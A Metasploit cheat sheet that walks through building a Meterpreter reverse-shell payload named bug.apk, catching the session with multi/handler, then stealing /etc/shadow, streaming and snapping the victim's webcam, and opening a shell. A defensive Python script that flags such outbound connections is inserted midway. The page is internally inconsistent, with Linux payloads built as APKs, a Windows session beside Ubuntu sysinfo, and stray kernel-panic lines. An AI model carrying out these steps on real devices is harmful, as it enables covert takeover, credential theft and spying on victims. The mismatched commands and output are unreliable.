List Android payloads
- msfvenom -l | grep android
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager
android/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell
android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP
android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS
android/shell/reverse_tcp Spawn a piped command shell (sh). Connect back stager
Create the payload
- msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.81.1.91 LPORT=4444 -f apk > bug.apk
- cp shell.elf /var/www/html/
Transfer the payload to the victim machine and execute it
Start the console
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
=[ metasploit v4.16.6-dev ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > use exploit/multi/handler
- msf exploit(handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 10.81.1.91
LHOST => 10.81.1.91
- msf exploit(handler) > set LPORT 6666
LPORT => 6666
Start the exploit
- msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.81.1.91:6666
Show the sessions
- msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows shuttle\xinux @ SHUTTLE 10.81.1.91:4444 -> 10.81.70.36:50707 (10.81.70.36)
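Seen from the victim host, the session listed above is an established outbound TCP connection to the handler. The following is an added example, not part of the original page: it parses `ss -tnp` output and flags such connections. The sample lines, process names, PIDs, watch-list ports and allowlist are constructed assumptions.

```python
import re

# Constructed `ss -tnp` output as seen on the victim. Addresses and ports mirror
# the session line on this page; process names and PIDs are made up.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
ESTAB  0      0      10.81.70.36:50707   10.81.1.91:4444   users:(("bug",pid=14701,fd=3))
ESTAB  0      0      10.81.70.36:22      10.81.1.50:51512  users:(("sshd",pid=901,fd=3))
ESTAB  0      0      10.81.70.36:41822   10.81.1.10:443    users:(("firefox",pid=2210,fd=88))
ESTAB  0      0      10.81.70.36:39410   10.81.1.91:6666   users:(("sh",pid=15002,fd=4))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=640,fd=3))
"""

WATCH_PORTS = {4444, 6666}                 # LPORT values used on this page; operator-chosen, so only a hint
EXPECTED_CLIENTS = {"firefox", "apt", "curl"}  # hypothetical allowlist of programs expected to dial out
EPHEMERAL_MIN = 32768                      # lower bound of the default Linux ip_local_port_range

# One established connection with its owning process (the -p column needs root).
LINE = re.compile(
    r'^ESTAB\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+)\s+'
    r'(?P<raddr>\S+):(?P<rport>\d+)\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)

def suspicious_connections(ss_output):
    """Return outbound established connections that merit a closer look."""
    findings = []
    for line in ss_output.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # header, LISTEN sockets, or rows without process info
        if int(m["lport"]) < EPHEMERAL_MIN:
            continue  # local side is a service port, so the peer connected to us
        reasons = []
        if int(m["rport"]) in WATCH_PORTS:
            reasons.append("watched peer port")
        if m["proc"] not in EXPECTED_CLIENTS:
            reasons.append("unexpected client process")
        if reasons:
            findings.append({"pid": int(m["pid"]), "proc": m["proc"],
                             "peer": f'{m["raddr"]}:{m["rport"]}', "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in suspicious_connections(SAMPLE_SS):
        print(f'{f["proc"]} (pid {f["pid"]}) -> {f["peer"]}: {", ".join(f["reasons"])}')
```

The port watch list only catches default or reused listener ports; the process allowlist is the stronger signal and has to be tuned per host.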
Switch into a session
- msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
Meterpreter file management
pwd
cd
- meterpreter > cd ..
- meterpreter > cd /etc
Download
- meterpreter > download shadow
upload
- meterpreter > cd /root
- meterpreter > upload /etc/hosts
Webcam
list
- meterpreter > webcam_list
1: Integrated Camera
Live stream
- meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: XZLHwhtQ.html
[*] Streaming...
snap
- meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/PDYSnlbK.jpeg
Start a shell (no shell prompt)
Process 14779 created.
Channel 5 created.
- C:\Users\xinux\Downloads>
Shell examples
- ifconfig
- route -n
- netstat -ltpn
Quit
Sysinfo
Computer : gustavo.xinux.lan
OS : Ubuntu 16.04 (Linux 4.4.0-97-generic)
Architecture : x64
Meterpreter : x64/linux
Kill a process
- meterpreter > pkill notepad
Filtering on 'notepad'
Killing: 3240